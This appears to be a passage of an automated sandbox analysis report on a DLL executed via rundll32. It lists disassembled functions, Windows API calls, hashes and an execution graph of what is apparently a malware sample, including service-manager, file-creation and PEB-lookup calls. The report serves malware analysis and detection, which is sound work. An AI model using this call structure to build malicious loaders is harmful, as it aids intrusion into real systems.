                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 685759847-0
                                                                                                                                    • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                    • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                                    • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                    • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 1473721057-3887548279
                                                                                                                                    • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                    • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                                    • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                    • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog3
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 431132790-2766056989
                                                                                                                                    • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                    • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                                    • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                    • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                    • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                      • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                      • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                      • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                      • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                    • String ID: %s.dll
                                                                                                                                    • API String ID: 3444012488-3668843792
                                                                                                                                    • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                    • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                                    • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                    • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                    • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                    • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                                    • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                    • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                    • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2949335588-0
                                                                                                                                    • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                    • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                                    • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                    • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253506028-0
                                                                                                                                    • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                    • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                                    • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                    • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                    • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3969253408-0
                                                                                                                                    • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                    • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                    • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                    • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:15.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1080
                                                                                                                                    Total number of Limit Nodes:17
                                                                                                                                    execution_graph 3982 202950 3987 212550 3982->3987 3986 202a1a 3997 213775 3987->3997 3992 213fe1 4239 2091b0 3992->4239 3996 213ff6 4246 217dd5 3996->4246 3997->3992 3997->3996 3998 202a06 3997->3998 4003 213fbb 3997->4003 4008 218519 GetPEB 3997->4008 4010 21e1d4 RtlAllocateHeap GetPEB 3997->4010 4022 217ba6 RtlAllocateHeap GetPEB 3997->4022 4025 20a8b0 GetPEB 3997->4025 4029 2120ba 3997->4029 4039 214116 3997->4039 4047 210326 3997->4047 4051 2059f2 3997->4051 4061 2195fa 3997->4061 4072 21044f 3997->4072 4086 215cc4 3997->4086 4099 2187d1 3997->4099 4104 2064e2 3997->4104 4114 21473c 3997->4114 4121 205361 3997->4121 4129 211ddd 3997->4129 4133 220056 3997->4133 4144 2166ca 3997->4144 4154 202251 3997->4154 4161 20b2c7 3997->4161 4173 211ee7 3997->4173 4176 219eec 3997->4176 4185 2051bb 3997->4185 4190 218be3 3997->4190 4194 20dff3 3997->4194 4201 217d48 3997->4201 4204 21d2ce 3997->4204 4209 208dc4 3997->4209 4213 206d24 3997->4213 4222 219bcf 3997->4222 4026 2093ed 3998->4026 4228 21cb5b 4003->4228 4008->3997 4010->3997 4022->3997 4025->3997 4027 21aa30 GetPEB 4026->4027 4028 209456 ExitProcess 4027->4028 4028->3986 4033 2123c3 4029->4033 4030 212503 4284 21da22 4030->4284 4033->4030 4036 212501 4033->4036 4260 218f9e 4033->4260 4264 2146bb 4033->4264 4268 20912c 4033->4268 4272 207ff2 4033->4272 4277 20a55f 4033->4277 4036->3997 4040 2143df 4039->4040 4044 214508 4040->4044 4045 21da22 GetPEB 4040->4045 4337 209350 4040->4337 4341 211e67 4040->4341 4345 208f65 4040->4345 4349 21c1ec 4040->4349 4044->3997 4045->4040 4048 210340 4047->4048 4049 209011 RtlAllocateHeap GetPEB LoadLibraryW 4048->4049 4050 21044a 4048->4050 4049->4048 4050->3997 4058 205caf 4051->4058 4053 205db3 4367 203c3c 4053->4367 4055 205db1 4055->3997 4056 21da22 GetPEB 4056->4058 4058->4053 4058->4055 4058->4056 4353 2213ad 4058->4353 4377 21dcf7 4058->4377 4381 2047ce 4058->4381 4385 20a8b0 4058->4385 4069 2199cc 4061->4069 4063 219ba9 4066 211e67 2 API calls 4063->4066 4064 21dcf7 2 API calls 4064->4069 4065 219ba7 4065->3997 4066->4065 4067 208f65 2 API calls 4067->4069 4068 2047ce GetPEB 4068->4069 4069->4063 4069->4064 4069->4065 4069->4067 4069->4068 4070 20a8b0 GetPEB 4069->4070 4071 21c1ec GetPEB 4069->4071 4426 205ddd 4069->4426 4070->4069 4071->4069 4076 210859 4072->4076 4074 21dcf7 2 API calls 4074->4076 4075 2109d9 4077 218519 GetPEB 4075->4077 4076->4074 4076->4075 4079 210894 4076->4079 4081 207ff2 RtlAllocateHeap GetPEB 4076->4081 4084 20a8b0 GetPEB 4076->4084 4085 2108b3 4076->4085 4430 209462 4076->4430 4434 210dd6 4076->4434 4082 2109ec 4077->4082 4438 20957d 4079->4438 4081->4076 4083 218519 GetPEB 4082->4083 4083->4085 4084->4076 4085->3997 4091 2163a1 4086->4091 4087 218f9e 2 API calls 4087->4091 4089 21dcf7 2 API calls 4089->4091 4090 216521 4092 218f9e 2 API calls 4090->4092 4091->4087 4091->4089 4091->4090 4093 216543 4091->4093 4095 2146bb 2 API calls 4091->4095 4096 20912c 2 API calls 4091->4096 4098 20a8b0 GetPEB 4091->4098 4442 20d6d8 4091->4442 4455 201cec 4091->4455 4459 211652 4091->4459 4092->4093 4093->3997 4095->4091 4096->4091 4098->4091 4100 21888d 4099->4100 4102 218935 4100->4102 4482 20ee08 4100->4482 4486 21ab5e 4100->4486 4102->3997 4111 20651f 4104->4111 4105 218519 GetPEB 4105->4111 4108 204b61 GetPEB 4108->4111 4110 206bd9 4110->3997 4111->4105 4111->4108 4111->4110 4490 21a666 4111->4490 4500 21f435 4111->4500 4518 20cf47 4111->4518 4530 205548 4111->4530 4539 21e395 4111->4539 4118 214a28 4114->4118 4115 20912c 2 API calls 4115->4118 4116 214b7d 4116->3997 4117 218f9e GetPEB CloseServiceHandle 4117->4118 4118->4115 4118->4116 4118->4117 4120 2042c4 2 API calls 4118->4120 4704 20e249 4118->4704 4120->4118 4128 20537b 4121->4128 4122 218519 GetPEB 4122->4128 4123 207ff2 2 API calls 4123->4128 4125 20553e 4125->3997 4128->4122 4128->4123 4128->4125 4708 20960d 4128->4708 4712 220f33 4128->4712 4722 20924b 4128->4722 4130 211df2 4129->4130 4131 21aa30 GetPEB 4130->4131 4132 211e5c 4131->4132 4132->3997 4138 220720 4133->4138 4135 20cb52 GetPEB 4135->4138 4137 2146bb 2 API calls 4137->4138 4138->4135 4138->4137 4139 2209a3 4138->4139 4141 20a8b0 GetPEB 4138->4141 4142 21dcf7 RtlAllocateHeap GetPEB 4138->4142 4143 211652 GetPEB 4138->4143 4817 20f002 4138->4817 4821 20aad6 4138->4821 4825 201fd1 4138->4825 4139->3997 4141->4138 4142->4138 4143->4138 4829 215c73 4144->4829 4146 2213ad 2 API calls 4152 216a65 4146->4152 4147 21dcf7 RtlAllocateHeap GetPEB 4147->4152 4148 216bbb 4148->3997 4149 21d25e GetPEB 4149->4152 4151 2047ce GetPEB 4151->4152 4152->4146 4152->4147 4152->4148 4152->4149 4152->4151 4153 20a8b0 GetPEB 4152->4153 4832 21453f 4152->4832 4153->4152 4158 20227a 4154->4158 4155 202918 4156 220e3a GetPEB 4155->4156 4157 202916 4156->4157 4157->3997 4158->4155 4158->4157 4159 220e3a GetPEB 4158->4159 4160 207ff2 2 API calls 4158->4160 4159->4158 4160->4158 4163 20b2df 4161->4163 4162 207ff2 2 API calls 4162->4163 4163->4162 4170 20b6c2 4163->4170 4836 210b19 4163->4836 4843 210e53 4163->4843 4855 216df8 4163->4855 4876 214b87 4163->4876 4897 20f09b 4163->4897 4909 209714 4163->4909 4917 211889 4163->4917 4928 20b74d 4163->4928 4170->3997 4174 208dc4 GetPEB 4173->4174 4175 211f83 4174->4175 4175->3997 4181 21a152 4176->4181 4177 218519 GetPEB 4177->4181 4180 21a2de 4180->3997 4181->4177 4181->4180 5055 20f899 4181->5055 5058 20a9ce 4181->5058 5062 208ece 4181->5062 5066 204346 4181->5066 5073 204e7d 4181->5073 4188 205275 4185->4188 4187 207ff2 2 API calls 4187->4188 4188->4187 4189 2052b8 4188->4189 5081 210001 4188->5081 4189->3997 4192 218e25 4190->4192 4191 21d25e GetPEB 4191->4192 4192->4191 4193 218ef1 4192->4193 4193->3997 4196 20e1a7 4194->4196 4195 20e207 4198 2046be GetPEB 4195->4198 4196->4195 4197 207ff2 2 API calls 4196->4197 4200 20e205 4196->4200 5110 207af6 4196->5110 4197->4196 4198->4200 4200->3997 4202 207ff2 2 API calls 4201->4202 4203 217dc1 4202->4203 4203->3997 4205 215c73 GetPEB 4204->4205 4206 21d370 4205->4206 5114 218b55 4206->5114 4210 208ddd 4209->4210 4211 21aa30 GetPEB 4210->4211 4212 208e3e 4211->4212 4212->3997 4220 206f44 4213->4220 4214 206ffc 5118 209dcf 4214->5118 4215 20b6cf GetPEB 4215->4220 4217 206ffa 4217->3997 4218 21dcf7 2 API calls 4218->4220 4219 2047ce GetPEB 4219->4220 4220->4214 4220->4215 4220->4217 4220->4218 4220->4219 4221 20a8b0 GetPEB 4220->4221 4221->4220 4226 219d3b 4222->4226 4223 219e49 4223->3997 4224 20b6cf GetPEB 4224->4226 4226->4223 4226->4224 5141 2052c2 4226->5141 5144 209b83 4226->5144 4236 21cb83 4228->4236 4229 21dcf7 RtlAllocateHeap GetPEB 4229->4236 4230 21d0a6 4232 20ab87 3 API calls 4230->4232 4231 2146bb 2 API calls 4231->4236 4234 21d0d0 4232->4234 4233 21d259 4233->4233 4234->3998 4235 211652 GetPEB 4235->4236 4236->4229 4236->4230 4236->4231 4236->4233 4236->4235 4238 20a8b0 GetPEB 4236->4238 5182 21e32e 4236->5182 4238->4236 4244 2091be 4239->4244 4240 210da3 4240->3998 4241 208dc4 GetPEB 4241->4244 4242 218519 GetPEB 4242->4244 4243 219e56 GetPEB 4243->4244 4244->4240 4244->4241 4244->4242 4244->4243 4245 211e67 2 API calls 4244->4245 4245->4244 4247 218118 4246->4247 4249 21dcf7 2 API calls 4247->4249 4250 218247 4247->4250 4251 2213ad 2 API calls 4247->4251 4253 21473c 4 API calls 4247->4253 4254 2047ce GetPEB 4247->4254 4258 20a8b0 GetPEB 4247->4258 4259 218245 4247->4259 5186 203e3f 4247->5186 5195 216c49 4247->5195 4249->4247 4252 20b6cf GetPEB 4250->4252 4251->4247 4255 21825f 4252->4255 4253->4247 4254->4247 5202 20b1c6 4255->5202 4258->4247 4259->3998 4261 218fb3 4260->4261 4288 21aa30 4261->4288 4265 2146da 4264->4265 4266 21aa30 GetPEB 4265->4266 4267 214729 SHGetFolderPathW 4266->4267 4267->4033 4269 209149 4268->4269 4270 21aa30 GetPEB 4269->4270 4271 2091a2 OpenSCManagerW 4270->4271 4271->4033 4318 201db9 4272->4318 4276 2080db 4276->4033 4281 20a73c 4277->4281 4279 20a7f0 4329 203bc0 4279->4329 4280 21da22 GetPEB 4280->4281 4281->4279 4281->4280 4283 20a7ee 4281->4283 4325 20cb52 4281->4325 4283->4033 4285 21da3d 4284->4285 4333 21adc9 4285->4333 4289 218ffc CloseServiceHandle 4288->4289 4290 21ab1d 4288->4290 4289->4033 4294 210a0e 4290->4294 4292 21ab33 4297 20cdcd 4292->4297 4301 214087 GetPEB 4294->4301 4296 210aa6 4296->4292 4299 20cdec 4297->4299 4298 20cf0f 4298->4289 4299->4298 4302 21be27 4299->4302 4301->4296 4303 21bfb1 4302->4303 4310 20ade6 4303->4310 4306 21bff5 4308 21c029 4306->4308 4309 20cdcd GetPEB 4306->4309 4308->4298 4309->4308 4311 20adfa 4310->4311 4312 21aa30 GetPEB 4311->4312 4313 20ae57 4312->4313 4313->4306 4314 21cadf 4313->4314 4315 21caf5 4314->4315 4316 21aa30 GetPEB 4315->4316 4317 21cb50 4316->4317 4317->4306 4319 21aa30 GetPEB 4318->4319 4320 201e19 4319->4320 4321 201e22 4320->4321 4322 201e3d 4321->4322 4323 21aa30 GetPEB 4322->4323 4324 201e96 RtlAllocateHeap 4323->4324 4324->4276 4326 20cb6b 4325->4326 4327 21aa30 GetPEB 4326->4327 4328 20cbd4 4327->4328 4328->4281 4330 203bd8 4329->4330 4331 21aa30 GetPEB 4330->4331 4332 203c2d 4331->4332 4332->4283 4334 21adee 4333->4334 4335 21aa30 GetPEB 4334->4335 4336 21ae5d 4335->4336 4336->4036 4338 209371 4337->4338 4339 21aa30 GetPEB 4338->4339 4340 2093db 4339->4340 4340->4040 4342 211e7d 4341->4342 4343 21aa30 GetPEB 4342->4343 4344 211edb CloseHandle 4343->4344 4344->4040 4346 208f90 4345->4346 4347 21aa30 GetPEB 4346->4347 4348 208ff5 CreateFileW 4347->4348 4348->4040 4350 21c1fb 4349->4350 4351 21aa30 GetPEB 4350->4351 4352 21c258 4351->4352 4352->4040 4354 2213cb 4353->4354 4389 204b61 4354->4389 4357 204b61 GetPEB 4358 221637 4357->4358 4359 204b61 GetPEB 4358->4359 4360 22164d 4359->4360 4361 203bc0 GetPEB 4360->4361 4362 221666 4361->4362 4363 203bc0 GetPEB 4362->4363 4364 221681 4363->4364 4393 204ddd 4364->4393 4366 2216bf 4366->4058 4368 203c56 4367->4368 4369 21dcf7 2 API calls 4368->4369 4370 203d7a 4369->4370 4405 